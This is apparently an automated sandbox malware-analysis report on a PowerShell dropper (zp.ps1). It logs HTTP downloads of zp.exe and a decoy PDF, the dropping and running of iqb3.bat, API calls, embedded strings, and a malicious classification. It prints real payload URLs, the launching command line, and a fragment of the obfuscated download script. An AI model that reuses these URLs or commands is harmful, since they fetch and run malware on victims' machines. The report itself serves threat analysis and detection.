Click to jump to signature section
Source: unknown | HTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.6:49693 version: TLS 1.0 |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00405FE2 FindFirstFileA,FindClose, | 2_2_00405FE2 |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, | 2_2_0040559E |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00402645 FindFirstFileA, | 2_2_00402645 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad |
Source: global traffic | HTTP traffic detected: GET /zp/zp.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 84.16.234.51:443 -> 192.168.2.6:49693 version: TLS 1.0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693 |
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443 |
Source: powershell.exe, 00000000.00000002.523613908.000002D25B28A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.621608396.000002D275760000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micrp |
Source: text-x-generic-template.png.2.dr | String found in binary or memory: http://jimmac.musichall.czif |
Source: iqb3.bat, iqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error |
Source: iqb3.bat, 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, iqb3.bat, 00000002.00000000.492453132.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, iqb3.bat.0.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D2B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com |
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf |
Source: powershell.exe, 00000000.00000002.530639507.000002D25E3CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.bluemaxxlaser.comx |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp, zp.ps1 | String found in binary or memory: http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdf |
Source: powershell.exe, 00000000.00000002.620400615.000002D275472000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coP |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.530639507.000002D25ED89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.614964683.000002D26D462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.614964683.000002D26D31F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.530639507.000002D25D4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.530639507.000002D25DCB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dld.ae |
Source: powershell.exe, 00000000.00000002.530639507.000002D25DCB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dld.ae/zp/zp.exe |
Source: unknown | DNS traffic detected: queries for: www.dld.ae |
Source: global traffic | HTTP traffic detected: GET /zp/zp.exe HTTP/1.1Host: www.dld.aeConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive |
Source: iqb3.bat, 00000002.00000002.751970846.000000000054A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, | 2_2_00405107 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to dropped file |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, | 2_2_00403217 |
Source: C:\Users\Public\iqb3.bat | File created: C:\Windows\resources\0409 | Jump to behavior |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00404946 | 2_2_00404946 |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_004062B8 | 2_2_004062B8 |
Source: C:\Users\Public\iqb3.bat | Process Stats: CPU usage > 98% |
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll 75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49 |
Source: zp.ps1 | Virustotal: Detection: 18% |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zp.ps1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\iqb3.bat "C:\Users\Public\iqb3.bat" | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf | |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\iqb3.bat "C:\Users\Public\iqb3.bat" | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\Public\iqb3.bat | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44kl3ld2.v02.ps1 | Jump to behavior |
Source: classification engine | Classification label: mal60.winPS1@13/63@3/3 |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00402036 CoCreateInstance,MultiByteToWideChar, | 2_2_00402036 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini | Jump to behavior |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, | 2_2_0040440A |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll | Jump to behavior |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll | Jump to behavior |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_10002D40 push eax; ret | 2_2_10002D6E |
Source: C:\Users\Public\iqb3.bat | Code function: 2_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress, | 2_2_00406009 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to dropped file |
Source: C:\Users\Public\iqb3.bat | File created: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp\System.dll | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\iqb3.bat | Jump to dropped file |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.bluiblmaxxlasiblr.com/rh/List%20of%20riblquiribld%20itiblms%20and%20siblrvicibls.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging |